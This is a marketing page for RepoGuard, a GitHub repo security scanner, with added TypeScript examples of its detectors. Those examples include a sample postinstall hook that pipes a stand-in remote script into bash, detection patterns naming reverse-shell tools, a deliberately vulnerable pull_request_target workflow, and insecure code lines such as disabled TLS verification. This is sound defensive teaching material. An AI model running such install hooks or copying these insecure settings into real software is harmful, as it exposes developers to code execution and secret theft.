v0.9 · free during beta · no card required

see what
you committed.

RepoGuard scans any public GitHub repo for exposed secrets, vulnerable dependencies, IaC misconfigs, and the insecure patterns your AI assistant just generated. Nine detectors, one click, results in under sixty seconds.

// no login required · 10 scans/h per IP · 5 scans/h per repo · public repos only

9 detectors
172 rules
SARIF 2.1 code scanning export
<60s scan time
EU data region
MIT license
// example output

what a real scan looks like.

Findings come back grouped by severity, with a file path, line number, and a masked preview. No 800-page PDF. No upsell to enterprise.

repoguard — scan
$ repoguard scan vercel/next.js
┌─ summary ────────────────────────────
│ risk score 92 / 100 excellent
│ files scanned 1,247
│ duration 47s
└──────────────────────────────────────
[CRIT]aws-access-key in commit history (3w ago)
[HIGH]next-public-secret-name CWE-200
[HIGH]cve-2024-21501 lodash@4.17.20
[HIGH]tls-verify-disabled CWE-295
[MED ]gha-pull-request-target-checkout-head
// 5 of 12 findings shown · ranked by risk score
// detectors

nine detectors,
run in parallel.

Each scan runs every detector against your repo concurrently. No setup, no config files, no allowlist tuning — just sane defaults that flag what an attacker would actually find.

01
secret-scanner
60+ high-confidence patterns: AWS, GCP, Anthropic, OpenAI, Stripe, Slack, GitHub PATs, SSH keys, Supabase service-role JWTs.
regex
02
sensitive-files
Flags filenames that imply secrets regardless of content: .env.production, id_rsa, terraform.tfstate, kubeconfig, .npmrc.
filename only
03
entropy
Catches custom-format secrets in .env / config files via Shannon entropy on KEY=VALUE pairs. Skips placeholders automatically.
≥ 4.0 bits/char
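As an added example (not RepoGuard's own code), here is a minimal version of the KEY=VALUE entropy check described above, run over a constructed .env. The 4.0 bits/char threshold is the one stated on this page; the 16-character minimum, the placeholder patterns and the mask format are this example's assumptions.

```typescript
// Added example, not RepoGuard's code. Entropy check over KEY=VALUE lines.
// Threshold 4.0 bits/char is from the page; MIN_LEN, the placeholder regex
// and the mask format are assumptions made for this illustration.

export interface EntropyFinding {
  line: number;
  key: string;
  entropy: number; // Shannon entropy, bits per character, rounded to 2 dp
  preview: string; // masked value; the full value is never stored
}

const THRESHOLD_BITS = 4.0; // from the page
const MIN_LEN = 16;         // assumption: shorter values are noise at this threshold

// Assumption: common placeholder shapes that must not be reported.
const PLACEHOLDER =
  /^(?:<[^>]*>|\$\{[^}]*\}|your[-_].*|change[-_]?me|replace[-_]?me|todo|xxx+|\*+|example.*|dummy.*|placeholder.*)$/i;

// H = -sum p(c) * log2 p(c) over the characters of the value.
export function shannonEntropy(value: string): number {
  if (value.length === 0) return 0;
  const counts = new Map<string, number>();
  for (let i = 0; i < value.length; i++) {
    const c = value.charAt(i);
    counts.set(c, (counts.get(c) ?? 0) + 1);
  }
  let h = 0;
  counts.forEach((n) => {
    const p = n / value.length;
    h -= p * Math.log2(p);
  });
  return h;
}

export function isPlaceholder(value: string): boolean {
  return PLACEHOLDER.test(value);
}

// Keep only the first and last four characters, as a findings view would.
export function mask(value: string): string {
  if (value.length <= 8) return "*".repeat(value.length);
  return value.slice(0, 4) + "…" + value.slice(-4);
}

export function scanEnv(text: string): EntropyFinding[] {
  const findings: EntropyFinding[] = [];
  const lines = text.split(/\r?\n/);
  for (let i = 0; i < lines.length; i++) {
    const raw = lines[i].trim();
    if (raw === "" || raw.startsWith("#")) continue;
    const eq = raw.indexOf("=");
    if (eq <= 0) continue;
    const key = raw.slice(0, eq).replace(/^export\s+/, "").trim();
    let value = raw.slice(eq + 1).trim();
    value = value.replace(/\s+#.*$/, "");         // drop a trailing inline comment
    value = value.replace(/^(["'])(.*)\1$/, "$2"); // strip matching quotes
    if (value.length < MIN_LEN || isPlaceholder(value)) continue;
    const h = shannonEntropy(value);
    if (h >= THRESHOLD_BITS) {
      findings.push({ line: i + 1, key, entropy: Number(h.toFixed(2)), preview: mask(value) });
    }
  }
  return findings;
}

// Constructed sample, not taken from any real repository.
export const SAMPLE_ENV = [
  "# database",
  "DATABASE_URL=postgres://app:app@localhost:5432/app",
  "SESSION_SECRET=changeme",
  "API_TOKEN=<your-token-here>",
  'HMAC_KEY="q7Zk2pLm9VwX4sRtB8nYcJ3dHf6GaE1u"',
  "LOG_LEVEL=debug",
].join("\n");
```

Running `scanEnv(SAMPLE_ENV)` reports only HMAC_KEY: 32 distinct characters give exactly 5.0 bits/char, while the connection string lands at about 3.84 and stays under the threshold, `changeme` is too short to score, and `<your-token-here>` is skipped as a placeholder before entropy is computed.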
04
git-history
Replays the last 30 commits looking for secrets that were deleted but never rotated. Dedups against the current tree.
30 commits
05
code-sast
AST-based via the TypeScript Compiler API plus targeted regex. 28 AST rules covering most of the OWASP Top 10 — SSRF, SQLi, command injection, reflected XSS, prototype pollution, ReDoS, NoSQL / SSTI injection, XXE, weak crypto, JWT misuse, hardcoded creds — plus AI-typical mistakes (TLS verify off, NEXT_PUBLIC_ secrets, bcrypt rounds < 10). Every rule CWE-tagged.
AST + regex · CWE-tagged
06
deps
npm package-lock.json against the npm advisories bulk API; PyPI requirements/pyproject/Pipfile against OSV.dev.
npm + OSV.dev
07
supply-chain
Typosquatting (Damerau-Levenshtein vs popular registries), install-hook abuse in package.json scripts and Python setup.py / pyproject.
npm + PyPI
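The two supply-chain heuristics above, as an added example that is not RepoGuard's code: a Damerau-Levenshtein distance (optimal string alignment variant) between each dependency name and a small constructed "popular packages" list, plus a scan of package.json lifecycle scripts for install-time download or shell patterns. The popular list, the distance cutoff of 2 and the suspicious-command patterns are assumptions chosen for illustration.

```typescript
// Added example, not RepoGuard's code. Typosquat distance against a small
// constructed "popular" list, plus an install-hook check over package.json
// scripts. The list, the cutoff and the hook heuristics are assumptions.

// Damerau-Levenshtein, optimal string alignment variant: insert, delete,
// substitute, or transpose two adjacent characters, each at cost 1.
export function damerauLevenshtein(a: string, b: string): number {
  const m = a.length;
  const n = b.length;
  const d: number[][] = [];
  for (let i = 0; i <= m; i++) {
    d.push(new Array<number>(n + 1).fill(0));
    d[i][0] = i;
  }
  for (let j = 0; j <= n; j++) d[0][j] = j;
  for (let i = 1; i <= m; i++) {
    for (let j = 1; j <= n; j++) {
      const cost = a.charAt(i - 1) === b.charAt(j - 1) ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a.charAt(i - 1) === b.charAt(j - 2) && a.charAt(i - 2) === b.charAt(j - 1)) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // adjacent transposition
      }
    }
  }
  return d[m][n];
}

// Assumption: a real detector would use download-ranked registry data.
export const POPULAR_NPM = ["lodash", "express", "react", "axios", "chalk", "cross-env", "dotenv", "moment"];

export interface TyposquatFinding { dependency: string; lookalike: string; distance: number; }

export function checkTyposquats(deps: string[], popular: string[] = POPULAR_NPM, maxDistance = 2): TyposquatFinding[] {
  const out: TyposquatFinding[] = [];
  for (const dep of deps) {
    const name = dep.toLowerCase();
    // An exact popular name is the real package; very short names are too noisy to compare.
    if (popular.indexOf(name) !== -1 || name.length < 4) continue;
    let best: TyposquatFinding | null = null;
    for (const p of popular) {
      const distance = damerauLevenshtein(name, p);
      if (distance <= maxDistance && (best === null || distance < best.distance)) {
        best = { dependency: dep, lookalike: p, distance };
      }
    }
    if (best !== null) out.push(best);
  }
  return out;
}

export interface HookFinding { script: string; command: string; reason: string; }

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
// Assumption: shapes that justify a look, not proof of malice.
const SUSPICIOUS: Array<[RegExp, string]> = [
  [/\b(?:curl|wget)\b/, "fetches remote content at install time"],
  [/\b(?:bash|sh)\s+-c\b/, "spawns a shell"],
  [/\bnode\s+-e\b/, "evaluates inline JavaScript"],
  [/\bbase64\b/, "decodes an encoded payload"],
  [/\/dev\/tcp\/|\bnc\s+-e\b/, "opens a raw network connection"],
];

export function checkInstallHooks(pkg: { scripts?: Record<string, string> }): HookFinding[] {
  const out: HookFinding[] = [];
  const scripts = pkg.scripts ?? {};
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (command === undefined) continue;
    for (const [re, reason] of SUSPICIOUS) {
      if (re.test(command)) { out.push({ script: hook, command, reason }); break; }
    }
  }
  return out;
}

// Constructed package.json fragment; example.invalid is a reserved, non-resolving domain.
export const SAMPLE_PACKAGE = {
  dependencies: { lodahs: "^4.17.21", crossenv: "^5.0.0", react: "^18.0.0", "left-pad": "^1.3.0" },
  scripts: { postinstall: "curl -s https://example.invalid/x.sh | bash", prepare: "husky install", build: "tsc" },
};
```

The transposition rule is what makes `lodahs` score 1 from `lodash` rather than 2 under plain Levenshtein, and `crossenv` (one deleted hyphen) scores 1 from `cross-env`. `react` is skipped because it is the real package, and `husky install` in `prepare` is left alone because it matches none of the suspicious shapes.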
08
ci-iac
Dockerfile (root user, :latest tags, ADD-from-URL, secrets in ENV) and GitHub Actions (pull_request_target checkouts, unpinned actions, write-all permissions).
CWE-tagged
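The three GitHub Actions checks named above, as an added example that is not RepoGuard's code. It runs line-oriented checks over a constructed workflow that has every weakness, and over a hardened version of the same job; a real detector would parse the YAML, so the line scan and the rule names are this example's assumptions, and the 40-hex SHA is a placeholder, not a real commit.

```typescript
// Added example, not RepoGuard's code. Line-oriented checks over a GitHub
// Actions workflow for the three patterns the page names. A real detector
// would parse the YAML; the line scan here is an assumption made to keep the
// example self-contained.

export interface WorkflowFinding { rule: string; line: number; detail: string; }

const SHA_PIN = /^[0-9a-f]{40}$/;
const PR_TARGET = /^\s*(?:on:.*\bpull_request_target\b|pull_request_target:)/m;
const HEAD_REF = /\bref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(?:sha|ref)\s*\}\}/;

export function scanWorkflow(yaml: string): WorkflowFinding[] {
  const out: WorkflowFinding[] = [];
  const triggeredByPrTarget = PR_TARGET.test(yaml);
  let inCheckoutStep = false;
  const lines = yaml.split(/\r?\n/);
  for (let i = 0; i < lines.length; i++) {
    const line = lines[i];
    const num = i + 1;
    if (/^\s*-\s/.test(line)) inCheckoutStep = false; // a new list item ends the previous step
    const uses = /^\s*(?:-\s*)?uses:\s*([^\s#]+)/.exec(line);
    if (uses !== null) {
      const ref = uses[1];
      inCheckoutStep = ref.startsWith("actions/checkout@");
      const at = ref.lastIndexOf("@");
      const local = ref.startsWith("./") || ref.startsWith("docker://");
      // A tag or branch can be moved by the action's maintainer; a commit SHA cannot.
      if (!local && (at === -1 || !SHA_PIN.test(ref.slice(at + 1)))) {
        out.push({ rule: "gha-unpinned-action", line: num, detail: ref });
      }
      continue;
    }
    // Fork PR code checked out under pull_request_target runs with the base repo's
    // secrets and write token: the classic "pwn request".
    if (inCheckoutStep && triggeredByPrTarget && HEAD_REF.test(line)) {
      out.push({ rule: "gha-pull-request-target-checkout-head", line: num, detail: line.trim() });
    }
    if (/^\s*permissions:\s*write-all\s*$/.test(line)) {
      out.push({ rule: "gha-write-all-permissions", line: num, detail: "permissions: write-all" });
    }
  }
  return out;
}

// Constructed workflow with the weak settings; the 40-hex SHA is a placeholder.
export const RISKY_WORKFLOW = [
  "name: pr-check",
  "on:",
  "  pull_request_target:",
  "    types: [opened, synchronize]",
  "permissions: write-all",
  "jobs:",
  "  test:",
  "    runs-on: ubuntu-latest",
  "    steps:",
  "      - uses: actions/checkout@v4",
  "        with:",
  "          ref: ${{ github.event.pull_request.head.sha }}",
  "      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # placeholder SHA",
  "      - run: npm ci && npm test",
].join("\n");

// Same job, hardened: pull_request trigger, read-only token, checkout pinned to a SHA.
export const SAFE_WORKFLOW = [
  "name: pr-check",
  "on: [pull_request]",
  "permissions:",
  "  contents: read",
  "jobs:",
  "  test:",
  "    runs-on: ubuntu-latest",
  "    steps:",
  "      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567 # placeholder SHA",
  "      - run: npm ci && npm test",
].join("\n");
```

On the risky workflow this returns three findings (write-all on line 5, the unpinned `actions/checkout@v4` on line 10, the head checkout on line 12) and none on the hardened one. The head checkout is the one to fix first: under `pull_request_target` the job has the base repository's secrets and a writable token, so `npm ci && npm test` executes whatever a fork's `package.json` or test files contain. Switching the trigger to `pull_request` (or checking out the base ref and never running untrusted code) removes that path.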
09
posture + iam
Repo posture (A+ to F grade — branch protection, CODEOWNERS, signed commits, Dependabot) plus an IAM-risk lens built by a 10-year IAM/IGA specialist: org MFA enforcement, outside-collaborator permission levels, admin-equivalent privilege paths, stale-owner authorship signals. The slice of enterprise IAM tooling solo devs have never had.
IAM-grade

// more detectors added based on what users actually leak

// beyond detection

detect, then
actually fix it.

A finding you can't act on is just noise. Every scan ships with the rails to move from "here's what's wrong" to "here's the PR that fixes it" — or, when it's a false positive, to make it stop nagging you.

## sarif 2.1 export

Every saved scan is one click from a SARIF 2.1.0 export — drop it into github/codeql-action/upload-sarif and findings show up in your repo's Security → Code scanning tab next to CodeQL and Dependabot. Each rule deep-links back to its docs.

## auto-fix prs

For findings with a clean fix (dependency bumps, secret extraction to process.env / os.environ), RepoGuard opens a PR against your repo directly. Per-finding opt-in, isolated branch, preview before submit. You review before merging.

## suppressions

False positives happen. Suppress a single finding (by fingerprint), a rule on a path (by glob), or a whole rule for the repo — all from the findings view. User-scoped, synced via Supabase, survives across scans. .repoguardignore in your repo also honored.

// why repoguard

built for the dev who skips snyk.

## fast

Sign in with GitHub, pick a repo, get findings. No CLI, no pipeline, no config. Most scans finish in under a minute.

## private

We never store your source code. Only metadata, file paths, and masked previews. All in EU region. Open source — audit it.

## yours

No upsell to enterprise. No mandatory SSO. No usage gating during beta. The scan you'd actually run.

// faq

asked & answered.

Do you store my source code?

No. We fetch files from the GitHub API only during a scan and discard them immediately after. We persist findings (path, line, masked preview) — never the code itself.

What permissions does RepoGuard need?

Sign-in is via the RepoGuard Security GitHub App and gives us read access to your public repositories. We do not read private code. The optional auto-fix PR feature requires you to install the App on the target repo — that grants Contents: write and Pull requests: write scoped to that single repo, used only to open a PR you then review.

Can I scan private repositories?

Not yet. Sign-in today gives RepoGuard read access to your public repositories only. Private-repo support is on the roadmap.

How is this different from GitHub secret scanning?

GitHub's built-in scanning is free but limited to partner secret patterns. RepoGuard adds 60+ curated regex patterns, an entropy fallback for custom formats, SAST rules, IaC checks for Dockerfile and GitHub Actions, supply-chain heuristics (typosquatting, install-hook abuse), a 30-commit history replay, a posture grade, and an IAM-risk lens built by a 10-year IAM specialist. One screen, severity-ranked.

Does it catch insecure code generated by Copilot / Cursor / Claude?

Partly. The SAST detector flags patterns AI assistants commonly emit: TLS verification disabled (rejectUnauthorized: false / verify=False), session cookies with httpOnly: false, bcrypt rounds below 10, process.env fallbacks to a hardcoded secret-shaped literal, and NEXT_PUBLIC_*SECRET* env reads (which Next.js inlines into the client bundle). New rules added as patterns become visible.
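As an added example (not RepoGuard's rules), the five patterns listed in this answer as targeted regex checks with CWE tags, run over two constructed source files. Rule ids, the CWE assignments, and treating any 16+ character `[A-Za-z0-9_-]` literal as "secret-shaped" are this example's assumptions; RepoGuard describes its own rules as AST-based for most of these, which avoids the string-matching false positives a regex pass will have (a `rejectUnauthorized: false` inside a comment, for instance).

```typescript
// Added example, not RepoGuard's code. Targeted regex rules for the
// AI-typical mistakes listed above, run over two constructed source files.
// Rule ids, CWE tags and the "16+ characters" notion of secret-shaped are
// assumptions; RepoGuard's real rules are AST-based for most of these.

export interface SastFinding { rule: string; cwe: string; file: string; line: number; preview: string; }

interface Rule {
  id: string;
  cwe: string;
  re: RegExp;
  when?: (m: RegExpExecArray) => boolean; // extra condition on captured groups
  maskGroup?: number;                      // capture group to mask in the preview
}

const RULES: Rule[] = [
  { id: "tls-verify-disabled", cwe: "CWE-295",
    re: /rejectUnauthorized\s*:\s*false|\bverify\s*=\s*False\b/ },
  { id: "cookie-httponly-false", cwe: "CWE-1004",
    re: /\bhttpOnly\s*:\s*false\b/ },
  { id: "bcrypt-low-rounds", cwe: "CWE-916",
    re: /bcrypt\.(?:hash|genSalt)(?:Sync)?\((?:[^,()]+,)?\s*(\d+)\s*\)/,
    when: (m) => parseInt(m[1], 10) < 10 },
  { id: "hardcoded-secret-fallback", cwe: "CWE-798",
    re: /process\.env\.[A-Z0-9_]+\s*(?:\|\||\?\?)\s*["']([A-Za-z0-9_\-]{16,})["']/,
    maskGroup: 1 },
  { id: "next-public-secret-name", cwe: "CWE-200",
    re: /process\.env\.(NEXT_PUBLIC_[A-Z0-9_]*SECRET[A-Z0-9_]*)/ },
];

// Show the first four characters of a matched literal and hide the rest,
// so the stored preview never contains the full secret.
function maskLiteral(line: string, literal: string): string {
  return line.replace(literal, literal.slice(0, 4) + "*".repeat(literal.length - 4));
}

export function scanSource(file: string, text: string): SastFinding[] {
  const out: SastFinding[] = [];
  const lines = text.split(/\r?\n/);
  for (let i = 0; i < lines.length; i++) {
    const line = lines[i];
    for (const rule of RULES) {
      const m = rule.re.exec(line);
      if (m === null || (rule.when !== undefined && !rule.when(m))) continue;
      let preview = line.trim();
      if (rule.maskGroup !== undefined) {
        const literal = m[rule.maskGroup];
        if (literal !== undefined) preview = maskLiteral(preview, literal);
      }
      out.push({ rule: rule.id, cwe: rule.cwe, file, line: i + 1, preview });
    }
  }
  return out;
}

// Constructed files; the hex literal is random-looking filler, not a real credential.
export const SAMPLE_TS = [
  'import https from "node:https";',
  "const agent = new https.Agent({ rejectUnauthorized: false });",
  'const JWT_SECRET = process.env.JWT_SECRET || "c8f2a1e94b7d3f60a5e1c2b9d4f7a3e8";',
  'res.cookie("session", token, { httpOnly: false, secure: true });',
  "const weak = await bcrypt.hash(password, 8);",
  "const fine = await bcrypt.hash(password, 12);",
  "const key = process.env.NEXT_PUBLIC_STRIPE_SECRET_KEY;",
  "const site = process.env.NEXT_PUBLIC_SITE_URL;",
].join("\n");

export const SAMPLE_PY = [
  "import requests",
  "resp = requests.get(url, verify=False)",
].join("\n");
```

`scanSource("src/client.ts", SAMPLE_TS)` yields five findings on lines 2, 3, 4, 5 and 7; the `bcrypt.hash(password, 12)` and `NEXT_PUBLIC_SITE_URL` lines pass, and the stored preview for line 3 reads `"c8f2****…"` rather than the full literal. The Python file gets one CWE-295 finding on line 2 from the same rule.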

Is RepoGuard free?

Yes, fully free during the current beta. I'm still figuring out what people value enough to pay for — feedback is very welcome.

Where does my data live?

All scan metadata is stored in Supabase, EU region. The app runs on Vercel. Both providers are SOC 2 compliant. See /security for details.

What if a finding is a false positive?

Suppress it. From the findings view you can silence a single finding (by fingerprint), a rule on a path glob, or an entire rule for the repo. Suppressions are user-scoped, persisted in Supabase, and survive across scans — no need to commit a config file. If you prefer to version-control them, a .repoguardignore at the repo root is also honored.

Can I push RepoGuard findings into GitHub Code Scanning?

Yes. Every saved scan is one click from a SARIF 2.1.0 export — drop it into github/codeql-action/upload-sarif and the findings show up in your repo's Security → Code scanning tab next to CodeQL and Dependabot. Each result deep-links back to the matching rule documentation on RepoGuard. Full setup at /docs/sarif.
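The SARIF 2.1.0 export described here and in the "sarif 2.1 export" section above, as an added example that is not RepoGuard's export code. It turns a list of findings into the minimal log shape that `github/codeql-action/upload-sarif` accepts: one `rules` entry per rule id (with a `helpUri` for the deep link and a `security-severity` property GitHub uses to label alerts), and one `results` entry per finding. The finding shape, the severity-to-level mapping, the numeric scores and the docs URL prefix are assumptions; the field names and the `"2.1.0"` version come from the SARIF specification.

```typescript
// Added example, not RepoGuard's export code. Builds a SARIF 2.1.0 log that
// github/codeql-action/upload-sarif accepts. Finding shape, severity-to-level
// mapping, security-severity scores and the docs URL prefix are assumptions;
// the SARIF field names and the "2.1.0" version are from the spec.

export type Severity = "CRIT" | "HIGH" | "MED" | "LOW";

export interface Finding {
  rule: string;
  severity: Severity;
  cwe?: string;
  message: string;
  path: string; // repo-relative
  line: number; // 1-based
}

interface SarifRule {
  id: string;
  name: string;
  shortDescription: { text: string };
  helpUri: string;
  properties: { tags: string[]; "security-severity": string };
}

interface SarifResult {
  ruleId: string;
  ruleIndex: number;
  level: "error" | "warning" | "note";
  message: { text: string };
  locations: Array<{
    physicalLocation: {
      artifactLocation: { uri: string; uriBaseId: string };
      region: { startLine: number };
    };
  }>;
}

export interface SarifLog {
  $schema: string;
  version: "2.1.0";
  runs: Array<{
    tool: { driver: { name: string; version: string; informationUri: string; rules: SarifRule[] } };
    results: SarifResult[];
  }>;
}

// SARIF has three levels; Code scanning shows the finer severity from the rule's
// security-severity score (>= 9.0 critical, 7.0 to 8.9 high, 4.0 to 6.9 medium, else low).
const LEVEL: Record<Severity, "error" | "warning" | "note"> = { CRIT: "error", HIGH: "error", MED: "warning", LOW: "note" };
const SCORE: Record<Severity, string> = { CRIT: "9.5", HIGH: "8.0", MED: "5.5", LOW: "2.0" }; // assumed scores
const DOCS_BASE = "https://repoguard.example/docs/rules/"; // placeholder, not the real docs URL

export function toSarif(findings: Finding[]): SarifLog {
  const rules: SarifRule[] = [];
  const ruleIndex = new Map<string, number>();
  const results: SarifResult[] = [];
  for (const f of findings) {
    let idx = ruleIndex.get(f.rule);
    if (idx === undefined) {
      idx = rules.length;
      ruleIndex.set(f.rule, idx);
      rules.push({
        id: f.rule,
        name: f.rule,
        shortDescription: { text: f.message },
        helpUri: DOCS_BASE + f.rule,
        properties: { tags: f.cwe ? ["security", f.cwe] : ["security"], "security-severity": SCORE[f.severity] },
      });
    }
    results.push({
      ruleId: f.rule,
      ruleIndex: idx,
      level: LEVEL[f.severity],
      message: { text: f.message },
      locations: [{
        physicalLocation: {
          // uri must be relative with forward slashes; %SRCROOT% tells GitHub it is repo-relative.
          artifactLocation: { uri: f.path.replace(/^\.\//, ""), uriBaseId: "%SRCROOT%" },
          region: { startLine: Math.max(1, f.line) },
        },
      }],
    });
  }
  return {
    $schema: "https://json.schemastore.org/sarif-2.1.0.json",
    version: "2.1.0",
    runs: [{ tool: { driver: { name: "RepoGuard", version: "0.9", informationUri: "https://repoguard.example", rules } }, results }],
  };
}

// Constructed findings mirroring the example output on this page.
export const SAMPLE_FINDINGS: Finding[] = [
  { rule: "tls-verify-disabled", severity: "HIGH", cwe: "CWE-295", message: "TLS certificate verification disabled", path: "./src/client.ts", line: 2 },
  { rule: "tls-verify-disabled", severity: "HIGH", cwe: "CWE-295", message: "TLS certificate verification disabled", path: "scripts/fetch.py", line: 2 },
  { rule: "gha-pull-request-target-checkout-head", severity: "MED", message: "pull_request_target workflow checks out PR head", path: ".github/workflows/pr-check.yml", line: 12 },
];
```

Write `JSON.stringify(toSarif(findings), null, 2)` to a file such as `repoguard.sarif` and upload it from a workflow step using `github/codeql-action/upload-sarif` with `sarif_file` pointing at that file; the job needs `permissions: security-events: write`. If the log carries no `partialFingerprints`, the upload action computes `primaryLocationLineHash` itself so that re-uploads update existing alerts rather than duplicating them.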